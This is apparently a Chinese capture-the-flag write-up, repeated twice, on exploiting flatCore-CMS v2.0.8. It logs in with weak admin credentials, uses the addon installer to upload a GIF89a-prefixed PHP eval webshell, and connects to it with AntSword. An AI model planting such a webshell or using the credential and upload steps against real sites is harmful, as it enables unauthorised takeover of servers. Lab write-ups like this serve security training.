简介
flatCore-CMS v2.0.8 存在后台任意代码执行漏洞
正文
1.进入靶场
2.发现可以登录,弱口令,admin\12345678进入后台
3.addons-install可以上传文件4.上传一句话木马
GIF89a
<?php @eval($_POST['cmd']);?>
5.蚁剑连接
6.得到flag
flatCore-CMS v2.0.8 存在后台任意代码执行漏洞
1.进入靶场
2.发现可以登录,弱口令,admin\12345678进入后台
3.addons-install可以上传文件4.上传一句话木马
GIF89a
<?php @eval($_POST['cmd']);?>
5.蚁剑连接
6.得到flag